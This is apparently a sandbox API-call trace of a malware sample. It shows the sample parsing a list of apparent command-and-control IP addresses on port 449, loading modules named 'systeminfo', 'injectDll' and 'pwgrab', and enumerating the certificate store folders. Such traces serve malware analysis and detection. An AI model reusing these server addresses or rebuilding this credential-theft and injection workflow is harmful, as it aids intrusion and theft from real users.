	[0102.292] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.292] lstrcpynW (in: lpString1=0x248928, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.292] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x244c90, Size=0x600) returned 0x24c9a8
	[0102.292] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248928) returned 1
	[0102.292] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2456d8) returned 1
	[0102.293] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248940) returned 1
	[0102.293] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5a8) returned 1
	[0102.293] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x248868, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16
	[0102.293] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x248868, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=16 | out: lpWideCharStr="209.45.30.2:449") returned 16
	[0102.293] StrStrIW (lpFirst="209.45.30.2:449", lpSrch=":") returned=":449"
	[0102.293] lstrcpynW (in: lpString1=0x2456d8, lpString2="209.45.30.2:449", iMaxLength=12 | out: lpString1="209.45.30.2") returned="209.45.30.2"
	[0102.293] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.293] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.293] lstrcpynW (in: lpString1=0x248940, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.293] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19
	[0102.293] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245520, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=19 | out: lpWideCharStr="181.115.236.26:449") returned 19
	[0102.293] StrStrIW (lpFirst="181.115.236.26:449", lpSrch=":") returned=":449"
	[0102.293] lstrcpynW (in: lpString1=0x2456d8, lpString2="181.115.236.26:449", iMaxLength=15 | out: lpString1="181.115.236.26") returned="181.115.236.26"
	[0102.293] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.293] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.293] lstrcpynW (in: lpString1=0x248928, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.293] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245548, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0102.294] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245548, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=18 | out: lpWideCharStr="190.196.32.42:449") returned 18
	[0102.294] StrStrIW (lpFirst="190.196.32.42:449", lpSrch=":") returned=":449"
	[0102.294] lstrcpynW (in: lpString1=0x2456d8, lpString2="190.196.32.42:449", iMaxLength=14 | out: lpString1="190.196.32.42") returned="190.196.32.42"
	[0102.294] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.294] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.294] lstrcpynW (in: lpString1=0x248940, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.294] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0102.294] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245570, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=18 | out: lpWideCharStr="181.48.203.10:449") returned 18
	[0102.294] StrStrIW (lpFirst="181.48.203.10:449", lpSrch=":") returned=":449"
	[0102.294] lstrcpynW (in: lpString1=0x2456d8, lpString2="181.48.203.10:449", iMaxLength=14 | out: lpString1="181.48.203.10") returned="181.48.203.10"
	[0102.294] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.294] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.294] lstrcpynW (in: lpString1=0x248928, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.295] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245598, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20
	[0102.295] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245598, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=20 | out: lpWideCharStr="131.161.252.141:449") returned 20
	[0102.295] StrStrIW (lpFirst="131.161.252.141:449", lpSrch=":") returned=":449"
	[0102.295] lstrcpynW (in: lpString1=0x2456d8, lpString2="131.161.252.141:449", iMaxLength=16 | out: lpString1="131.161.252.141") returned="131.161.252.141"
	[0102.295] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.295] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.295] lstrcpynW (in: lpString1=0x248940, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.295] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2455c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19
	[0102.295] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2455c0, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=19 | out: lpWideCharStr="181.129.20.250:449") returned 19
	[0102.295] StrStrIW (lpFirst="181.129.20.250:449", lpSrch=":") returned=":449"
	[0102.296] lstrcpynW (in: lpString1=0x2456d8, lpString2="181.129.20.250:449", iMaxLength=15 | out: lpString1="181.129.20.250") returned="181.129.20.250"
	[0102.296] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.296] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.296] lstrcpynW (in: lpString1=0x248928, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.296] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2455e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0102.296] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2455e8, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=18 | out: lpWideCharStr="181.209.88.26:449") returned 18
	[0102.296] StrStrIW (lpFirst="181.209.88.26:449", lpSrch=":") returned=":449"
	[0102.296] lstrcpynW (in: lpString1=0x2456d8, lpString2="181.209.88.26:449", iMaxLength=14 | out: lpString1="181.209.88.26") returned="181.209.88.26"
	[0102.296] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.296] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.296] lstrcpynW (in: lpString1=0x248940, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.296] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245610, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0102.296] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245610, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=18 | out: lpWideCharStr="186.159.2.153:449") returned 18
	[0102.297] StrStrIW (lpFirst="186.159.2.153:449", lpSrch=":") returned=":449"
	[0102.297] lstrcpynW (in: lpString1=0x2456d8, lpString2="186.159.2.153:449", iMaxLength=14 | out: lpString1="186.159.2.153") returned="186.159.2.153"
	[0102.297] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.297] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.297] lstrcpynW (in: lpString1=0x248928, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.297] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x248880, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16
	[0102.297] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x248880, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=16 | out: lpWideCharStr="136.25.2.43:449") returned 16
	[0102.297] StrStrIW (lpFirst="136.25.2.43:449", lpSrch=":") returned=":449"
	[0102.297] lstrcpynW (in: lpString1=0x2456d8, lpString2="136.25.2.43:449", iMaxLength=12 | out: lpString1="136.25.2.43") returned="136.25.2.43"
	[0102.297] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.297] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.297] lstrcpynW (in: lpString1=0x248940, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.297] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245638, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18
	[0102.297] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245638, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=18 | out: lpWideCharStr="200.25.255.14:449") returned 18
	[0102.297] StrStrIW (lpFirst="200.25.255.14:449", lpSrch=":") returned=":449"
	[0102.298] lstrcpynW (in: lpString1=0x2456d8, lpString2="200.25.255.14:449", iMaxLength=14 | out: lpString1="200.25.255.14") returned="200.25.255.14"
	[0102.298] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.298] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.298] lstrcpynW (in: lpString1=0x248928, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.298] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245660, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19
	[0102.298] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245660, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=19 | out: lpWideCharStr="181.176.218.86:449") returned 19
	[0102.298] StrStrIW (lpFirst="181.176.218.86:449", lpSrch=":") returned=":449"
	[0102.298] lstrcpynW (in: lpString1=0x2456d8, lpString2="181.176.218.86:449", iMaxLength=15 | out: lpString1="181.176.218.86") returned="181.176.218.86"
	[0102.298] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.298] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.298] lstrcpynW (in: lpString1=0x248940, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.298] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20
	[0102.298] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x245688, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=20 | out: lpWideCharStr="181.129.137.170:449") returned 20
	[0102.298] StrStrIW (lpFirst="181.129.137.170:449", lpSrch=":") returned=":449"
	[0102.299] lstrcpynW (in: lpString1=0x2456d8, lpString2="181.129.137.170:449", iMaxLength=16 | out: lpString1="181.129.137.170") returned="181.129.137.170"
	[0102.299] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.299] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248928, Size=0x10) returned 0x248940
	[0102.299] lstrcpynW (in: lpString1=0x248928, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.299] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2456b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19
	[0102.299] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2456b0, cbMultiByte=-1, lpWideCharStr=0x1ec5a8, cchWideChar=19 | out: lpWideCharStr="186.87.135.191:449") returned 19
	[0102.299] StrStrIW (lpFirst="186.87.135.191:449", lpSrch=":") returned=":449"
	[0102.299] lstrcpynW (in: lpString1=0x2456d8, lpString2="186.87.135.191:449", iMaxLength=15 | out: lpString1="186.87.135.191") returned="186.87.135.191"
	[0102.299] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0102.299] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x248928
	[0102.299] lstrcpynW (in: lpString1=0x248940, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0102.300] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x248898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11
	[0102.300] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x248898, cbMultiByte=-1, lpWideCharStr=0x24c000, cchWideChar=11 | out: lpWideCharStr="systeminfo") returned 11
	[0102.300] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2488b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14
	[0102.300] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2488b0, cbMultiByte=-1, lpWideCharStr=0x24c028, cchWideChar=14 | out: lpWideCharStr="GetSystemInfo") returned 14
	[0102.301] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2488c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10
	[0102.301] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2488c8, cbMultiByte=-1, lpWideCharStr=0x24c0c8, cchWideChar=10 | out: lpWideCharStr="injectDll") returned 10
	[0102.301] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248940, Size=0x10) returned 0x24cfc8
	[0102.301] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2488e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7
	[0102.301] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2488e0, cbMultiByte=-1, lpWideCharStr=0x24cfe0, cchWideChar=7 | out: lpWideCharStr="pwgrab") returned 7
	[0102.301] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x24cfc8, Size=0x10) returned 0x24d010
	[0102.301] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24a3b8) returned 1
	[0102.302] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x129298 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x0
	[0102.308] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\*", lpFindFileData=0x128e10 | out: lpFindFileData=0x128e10*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xadce1b97, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0xadce1b97, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x75c5cb17, dwReserved1=0x38, cFileName=".", cAlternateFileName="")) returned 0x213ab0
	[0102.308] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.308] FindNextFileW (in: hFindFile=0x213ab0, lpFindFileData=0x128e10 | out: lpFindFileData=0x128e10*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xadce1b97, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0xadce1b97, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x75c5cb17, dwReserved1=0x38, cFileName="..", cAlternateFileName="")) returned 1
	[0102.308] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.308] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.308] FindNextFileW (in: hFindFile=0x213ab0, lpFindFileData=0x128e10 | out: lpFindFileData=0x128e10*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0x68f8aef5, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x68f8aef5, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x75c5cb17, dwReserved1=0x38, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1
	[0102.308] lstrcmpiW (lpString1="Microsoft", lpString2=".") returned 1
	[0102.308] lstrcmpiW (lpString1="Microsoft", lpString2="..") returned 1
	[0102.308] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\Microsoft\\\\*", lpFindFileData=0x128390 | out: lpFindFileData=0x128390*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0x68f8aef5, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x68f8aef5, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24ffe8, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213a70
	[0102.309] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.309] FindNextFileW (in: hFindFile=0x213a70, lpFindFileData=0x128390 | out: lpFindFileData=0x128390*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0x68f8aef5, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x68f8aef5, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24ffe8, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.309] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.309] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.309] FindNextFileW (in: hFindFile=0x213a70, lpFindFileData=0x128390 | out: lpFindFileData=0x128390*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xadce1b97, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0xadce1b97, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24ffe8, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1
	[0102.309] lstrcmpiW (lpString1="SystemCertificates", lpString2=".") returned 1
	[0102.309] lstrcmpiW (lpString1="SystemCertificates", lpString2="..") returned 1
	[0102.309] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\*", lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xadce1b97, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0xadce1b97, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213af0
	[0102.310] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.310] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xadce1b97, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0xadce1b97, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.310] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.310] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.310] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xadce1b97, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0xadce1b97, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 1
	[0102.310] lstrcmpiW (lpString1="My", lpString2=".") returned 1
	[0102.310] lstrcmpiW (lpString1="My", lpString2="..") returned 1
	[0102.310] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\*", lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xadce1b97, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0xadce1b97, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x251fe8, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b30
	[0102.310] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.310] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xadce1b97, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0xadce1b97, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x251fe8, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.310] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.310] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.311] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xadce1b97, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0xadce1b97, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x251fe8, dwReserved1=0x0, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1
	[0102.311] lstrcmpiW (lpString1="Certificates", lpString2=".") returned 1
	[0102.311] lstrcmpiW (lpString1="Certificates", lpString2="..") returned 1
	[0102.311] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\Certificates\\\\*", lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xadce1b97, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0xadce1b97, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b70
	[0102.311] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.311] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xadce1b97, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0xadce1b97, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.312] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.312] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.312] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xadce1b97, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0xadce1b97, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0102.312] FindClose (in: hFindFile=0x213b70 | out: hFindFile=0x213b70) returned 1
	[0102.312] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xadce1b97, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0xadce1b97, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x251fe8, dwReserved1=0x0, cFileName="CRLs", cAlternateFileName="")) returned 1
	[0102.312] lstrcmpiW (lpString1="CRLs", lpString2=".") returned 1
	[0102.312] lstrcmpiW (lpString1="CRLs", lpString2="..") returned 1
	[0102.312] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\CRLs\\\\*", lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xadce1b97, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0xadce1b97, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b70
	[0102.312] lstrcmpiW (lpString1=".", lpString2=".") returned 0
